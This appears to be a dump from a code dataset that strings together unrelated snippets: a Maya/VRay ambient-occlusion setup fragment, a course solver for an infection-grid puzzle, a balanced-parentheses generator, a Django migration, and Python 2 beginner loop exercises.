            shaderConnect = lamShader + '.surfaceShader'
            cmds.sets(renderable=True, noSurfaceShader=True,
                      empty=True, name=lamShader)
            cmds.connectAttr(lamConnect, shaderConnect)
            mel.eval('hookShaderOverride(\"' + curLayer + '\",\"\",\"' + override + '\")')
        # Determine the Render Elements in the scene and tune AO quality
        # per show (tighter radius / higher subdivs on WDS).
        for shader in cmds.ls(type='VRayDirt'):
            if 'AO' in shader:
                if show == 'WDS':
                    cmds.setAttr(shader + '.radius', 2.5)
                    cmds.setAttr(shader + '.distribution', 5)
                    cmds.setAttr(shader + '.subdivs', 30)
                else:
                    cmds.setAttr(shader + '.radius', 200)
                    cmds.setAttr(shader + '.distribution', 1.5)
                    cmds.setAttr(shader + '.subdivs', 16)
|
# Course-submission author IDs.
ids = ['315880575', '205847932']
def get_neighbors(coordinates, board_size, exclude=tuple()):
    """Return the in-bounds orthogonal neighbours of *coordinates* on a
    board of *board_size* (rows, cols), skipping tiles in *exclude*.

    Order is fixed: left, down, right, up.
    """
    row, col = coordinates
    rows, cols = board_size
    candidates = []
    if row != 0:
        candidates.append((row - 1, col))  # left
    if col != 0:
        candidates.append((row, col - 1))  # down
    if row != rows - 1:
        candidates.append((row + 1, col))  # right
    if col != cols - 1:
        candidates.append((row, col + 1))  # up
    return [tile for tile in candidates if tile not in exclude]
def get_neighbors_neighbors(coordinates, board_size, exclude=tuple()):
    """For each neighbour of *coordinates*, collect that neighbour's own
    neighbours, excluding *coordinates* itself.  One sub-list per
    neighbour, in get_neighbors() order."""
    non = list()
    neighbors = get_neighbors(coordinates, board_size, exclude)
    for n in neighbors:
        nn = get_neighbors(n, board_size, exclude)
        non.append([])
        for tile in nn:
            # NOTE(review): ``tile not in non`` compares a tuple against a
            # list of sub-lists, so it is always True; the intended test was
            # probably ``tile not in non[-1]``.  Left unchanged because
            # get_tile_status() depends on the current output.
            if tile not in non and tile != coordinates:
                non[-1].append(tile)
    return non # [[LL, LD, LU], [DL, DD, DR], [RD, RR, RU], [UL, UU, UR]]
def get_tile_status(input, tile, turn=0, exclude=tuple()): # input is input and tile is a tuple representing the tile requested
    """Infer the state of *tile* at *turn* from partial observation grids.

    Returns one of 'H'/'S'/'U' (healthy/sick/uninhabited), or the partial
    answers 'Not S' / 'Not U' / 'None' when only some states can be ruled
    out.  *exclude* carries the tiles already on the recursion path so the
    mutual neighbour look-ups cannot recurse forever.

    NOTE(review): the parameter ``input`` shadows the builtin; kept since
    callers pass the puzzle dict positionally.
    """
    # Direct observation for this turn settles the question immediately.
    if input["observations"][turn][tile[0]][tile[1]] != '?':
        return input["observations"][turn][tile[0]][tile[1]]
    unknown = True
    # 'U' (uninhabited) never changes, so any turn's observation settles it.
    for n in range(len(input["observations"])):
        if input["observations"][n][tile[0]][tile[1]] == 'U':
            return "U"
        if input["observations"][n][tile[0]][tile[1]] != '?':
            unknown = False
    # Exclude this tile from all neighbour queries below (recursion guard).
    exclude += tuple([tile])
    neighbors = get_neighbors(tile, (len(input["observations"][0]), len(input["observations"][0][0])), exclude)
    neighbors_neighbors = get_neighbors_neighbors(tile,
                                                  (len(input["observations"][0]), len(input["observations"][0][0])),
                                                  exclude)
    n_curr_status = [n for n in [get_tile_status(input, t, turn, exclude) for t in neighbors]]
    nn_curr_status = list()
    for nn in neighbors_neighbors:
        nn_curr_status.append([n for n in [get_tile_status(input, t, turn, exclude) for t in nn]])
    # attempting to see if at any point the tiles around it were affected
    infected = (False, 0)
    ever_infected = False
    tn = 0
    while unknown and tn < len(input["observations"]):
        # Sickness lasts three turns: count the infectious window down.
        infected = (True, infected[1]-1) if infected[1] > 1 else (False, 0)
        n_cr_stts = [n for n in [get_tile_status(input, t, tn, exclude) for t in neighbors]]
        nn_cr_stts = list()
        for nn in neighbors_neighbors:
            nn_cr_stts.append([n for n in [get_tile_status(input, t, tn, exclude) for t in nn]])
        if tn > 0:
            n_pre_stts = [n for n in [get_tile_status(input, t, tn - 1, exclude) for t in neighbors]]
            # A sick neighbour last turn would have infected this tile if it
            # were habitable and healthy.
            if any([n == "S" for n in n_pre_stts]):
                if not infected[0]:
                    infected = (True, 3)
                ever_infected = True
        if tn < len(input["observations"]) - 1:
            n_nxt_stts = [n for n in [get_tile_status(input, t, tn + 1, exclude) for t in neighbors]]
            for i in range(len(neighbors)):
                # if a nieghbor becomes sick and its for certain that it wasnt any other tile that infected it
                if n_cr_stts[i] == "H" and n_nxt_stts[i] == "S" and all([n != "S" for n in nn_cr_stts[i]]):
                    unknown = False  # not Uninhabited situation
                # A neighbour that should have caught the infection but
                # stayed healthy means this tile must be uninhabited.
                elif infected[0] and n_cr_stts[i] == "H" and n_nxt_stts[i] == "H" \
                        and all([n != "S" for n in nn_cr_stts[i]]):
                    return "U"
        tn += 1
    if unknown:
        if turn > 2 and not ever_infected:
            return "Not S"
        return "None"
    if turn > 0:
        n_prev_status = [n for n in [get_tile_status(input, t, turn-1, exclude) for t in neighbors]]
        # Sickness persists for 3 turns from its onset.
        if get_tile_status(input, tile, turn-1, exclude) == 'S' and turn < 3:
            return "S"
        if get_tile_status(input, tile, turn-1, exclude) == 'H':
            if all([n != "S" for n in n_prev_status]):
                return "H"
        if turn >= 3:
            # Three straight sick turns means recovery this turn.
            if all([i == "S" for i in [get_tile_status(input, tile, n, exclude) for n in range(turn-3, turn)]]):
                return "H"
            elif get_tile_status(input, tile, turn-1, exclude) == 'S':
                return "S"
        # did the tile get infected?
        if any([n == "S" for n in n_prev_status]):
            return "S"
    if turn < len(input["observations"]) - 1:
        n_next_status = [n for n in [get_tile_status(input, t, turn + 1, exclude) for t in neighbors]]
        for i in range(len(neighbors)):
            # if a nieghbor becomes sick and its for certain that it wasn't any other tile that infected it
            if n_curr_status[i] == "H" and n_next_status[i] == "S" and all([n != "S" for n in nn_curr_status[i]]):
                return "S"
            if n_curr_status[i] == "H" and n_next_status[i] == "H" and all([n != "S" for n in nn_curr_status[i]]):
                return "H"
    return "Not U"
def solve_problem(input):
    """Answer each query (tile, turn, claimed_state) with 'T', 'F' or '?'.

    'T'/'F' when the inferred status confirms/contradicts the claim, '?'
    when the observations cannot decide it.
    """
    answers = dict()
    for query in input["queries"]:
        tile, turn, claim = query[0], query[1], query[2]
        status = get_tile_status(input, tile, turn)
        if status == "None":
            verdict = '?'
        elif status == "Not S":
            verdict = 'F' if claim == 'S' else '?'
        elif status == "Not U":
            verdict = 'F' if claim == 'U' else '?'
        elif status == claim:
            verdict = 'T'
        else:
            verdict = 'F'
        answers[query] = verdict
    return answers
|
def valid_parentheses(pairs):
    """Return every valid sequence of *pairs* balanced parentheses pairs."""
    results = []

    def build(prefix, pairs_left, closable):
        # Invariant: prefix is a valid partial sequence with `closable`
        # still-open '(' that may be closed later.
        assert pairs_left >= 1
        opened = prefix + '('  # every step starts by opening one pair
        open_count = closable + 1
        pairs_left -= 1
        if pairs_left == 0:
            # No pairs left to open: close everything that is still open.
            results.append(opened + ')' * open_count)
            return
        for closes in range(open_count + 1):
            build(opened + ')' * closes, pairs_left, open_count - closes)

    build('', pairs, 0)
    return results
def check_valid(s):
    """Assert that *s* is a balanced string containing only '(' and ')'."""
    depth = 0
    for ch in s:
        assert ch in '()'
        if ch == '(':
            depth += 1
        else:
            # Closing below depth zero would mean an unmatched ')'.
            assert depth > 0
            depth -= 1
    assert depth == 0
def test_1(pairs=6):
    """Generate all sequences for *pairs* pairs and sanity-check each one."""
    sequences = valid_parentheses(pairs)
    for seq in sequences:
        check_valid(seq)
    return sequences
# Script entry point: print every valid 6-pair sequence.
if __name__ == "__main__":
    for s in test_1():
        print(s)
|
# Generated by Django 3.2 on 2021-04-18 20:03
from django.db import migrations, models
class Migration(migrations.Migration):
    """Order profiles by -points and add a self-referential friends M2M."""

    dependencies = [
        ('oauth', '0007_profile_profile_photo'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='profile',
            options={'ordering': ['-points']},
        ),
        migrations.AddField(
            model_name='profile',
            name='friends',
            # NOTE(review): null=True has no effect on ManyToManyField
            # (Django warns fields.W340); left as generated.
            field=models.ManyToManyField(null=True, related_name='_oauth_profile_friends_+', to='oauth.Profile', verbose_name='Friend list'),
        ),
    ]
|
# Problem 1 (Python 2 course notes): print the even numbers, then Goodbye.
# My solution
x = 0
while (x <= 10):
    x += 2
    print x
print 'Goodbye!'
# Best practice
num = 2
while num < 11:
    print num
    num += 2
print "Goodbye!"
# Problem 2: count down from 10 by twos (prints 10, 8, 6, 4, 2).
print "Hello!"
num = 10
while num > 0:
    print num # print the num first
    num -= 2
# Problem 3: sum the integers 1..end.
# NOTE(review): ``end`` is never defined in this file, so as written this
# snippet raises NameError -- it is lecture shorthand for some upper bound.
total = 0
current = 1
while current <= end:
    total += current # total = total + current, 1
    current += 1 # 1st, current = 2
print total
# Finding the cube root of some number by exhaustive enumeration.
# NOTE(review): only meaningful for non-negative input -- for x < 0 the
# loop never runs and the snippet reports "not a perfect cube".
x = int(raw_input('Enter an integer: '))
ans = 0
while ans**3 < x:
    ans = ans + 1
if ans**3 != x:
    print(str(x) + ' is not a perfect cube')
else:
    print('Cube root of ' + str(x) + ' is ' + str(ans))
# problem 1 to 3: iterating over strings character by character.
myStr = '6.00x'
for char in myStr:
    print char
print 'done'
greeting = 'Hello!'
count = 0
for letter in greeting:
    count += 1
    # Every second letter is printed twice: once here, once below.
    if count % 2 == 0:
        print letter
    print letter # this line means the letter will get printed anyway
print 'done'
# Quiz snippet: trace the branches.  Note two deliberate traps: the
# elif's 'o' test is unreachable (caught by the vowel branch first), and
# numCons is DEcremented, so the final count prints as a negative number.
school = 'Massachusetts Institute of Technology'
numVowels = 0
numCons = 0
for char in school:
    if char == 'a' or char == 'e' or char == 'i' \
    or char == 'o' or char == 'u':
        numVowels += 1
    elif char == 'o' or char == 'M':
        print char
    else:
        numCons -= 1
print 'numVowels is: ' + str(numVowels)
print 'numCons is: ' + str(numCons)
# The break exits after the first character, so only 'S' is reported
# and the final count printed is 1.
count = 0
for letter in 'Snow!':
    print 'Letter # ' + str(count) + ' is ' + str(letter)
    count += 1
    break
print count
# Compare to this one:
num = 10
for var in range(5):
    print var
print num
# Prints multiples of 4 below 20; 'Foo!' only for multiples of 16 (0, 16).
for variable in range(20):
    if variable % 4 == 0:
        print variable
        if variable % 16 == 0:
            print 'Foo!'
# L3 PROBLEM 5A: rewriting while-loops as for-loops.
# 1
for var in range(2, 12, 2):
    print var
print 'Goodbye!'
# 2
print 'Hello!'
for var in reversed(range(2, 12, 2)):
    print var
# 3
# Example:
# NOTE(review): ``end`` is undefined here as well (see Problem 3 above);
# these snippets assume it is supplied by the exercise harness.
total = 0
current = 1
while current <= end:
    total += current # total = total + current, 1
    current += 1 # 1st, current = 2
print total
total = 0
for var in range(1,end+1):
    total += var
# print total this is printing total in the for loop
print total # this is printing total at the end for once.
# L3 PROBLEM 6: seven variants of counting the characters of
# "hello, world" across five iterations -- compare where `count` is
# reset (or not) and how break changes each inner loop.
iteration = 0
count = 0
while iteration < 5:
    for letter in "hello, world":
        count += 1 # count get added for each letter in the string hello world
    print "Iteration " + str(iteration) + "; count is: " + str(count)
    iteration += 1
iteration = 0
while iteration < 5:
    count = 0 # This reset count back to 0 at the begining of every interation
    for letter in "hello, world":
        count += 1
    print "Iteration " + str(iteration) + "; count is: " + str(count)
    iteration += 1
iteration = 0
while iteration < 5:
    count = 0
    for letter in "hello, world":
        count += 1
        # On even iterations the for-loop stops after one character.
        if iteration % 2 == 0:
            break
    print "Iteration " + str(iteration) + "; count is: " + str(count)
    iteration += 1
for iteration in range(5):
    count = 0
    while True:
        for letter in "hello, world":
            count += 1
        print "Iteration " + str(iteration) + "; count is: " + str(count)
        break
count = 0
phrase = "hello, world"
for iteration in range(5):
    index = 0
    while index < len(phrase):
        count += 1
        index += 1
    print "Iteration " + str(iteration) + "; count is: " + str(count)
count = 0
phrase = "hello, world"
for iteration in range(5):
    while True:
        count += len(phrase)
        break
    print "Iteration " + str(iteration) + "; count is: " + str(count)
count = 0
phrase = "hello, world"
for iteration in range(5):
    count += len(phrase)
    print "Iteration " + str(iteration) + "; count is: " + str(count)
# Finding the sqrt of a num by stepping the guess until guess**2 is
# within epsilon of x (two equivalent loop formulations).
x = 25
epsilon = 0.01
step = 0.1
guess = 0.0
while guess <= x:
    if abs(guess**2 -x) < epsilon:
        break
    else:
        guess += step
if abs(guess**2 - x) >= epsilon:
    print 'failed'
else:
    print 'succeeded: ' + str(guess)
# Same search with the tolerance test moved into the loop condition.
x = 25
epsilon = 0.01
step = 0.1
guess = 0.0
while abs(guess**2-x) >= epsilon:
    if guess <= x:
        guess += step
    else:
        break
if abs(guess**2 - x) >= epsilon:
    print 'failed'
else:
    print 'succeeded: ' + str(guess)
# L3 PROBLEM 9: guess the user's secret number by bisection.
# NOTE: Python 2 -- (hi + lo)/2 is integer floor division, which is what
# keeps every guess a whole number here.
print("Please think of a number between 0 and 100!")
# At the start the highest the number could be is 100 and the lowest is 0.
hi = 100
lo = 0
guessed = False
# Loop until we guess it correctly
while not guessed:
    # Bisection search: guess the midpoint between our current high and low guesses
    guess = (hi + lo)/2
    print("Is your secret number " + str(guess)+ "?")
    user_inp = raw_input("Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed correctly. ")
    if user_inp == 'c':
        # We got it right!
        guessed = True
    elif user_inp == 'h':
        # Guess was too high. So make the current guess the highest possible guess.
        hi = guess
    elif user_inp == 'l':
        # Guess was too low. So make the current guess the lowest possible guess.
        lo = guess
    else:
        print("Sorry, I did not understand your input.")
print('Game over. Your secret number was: ' + str(guess))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.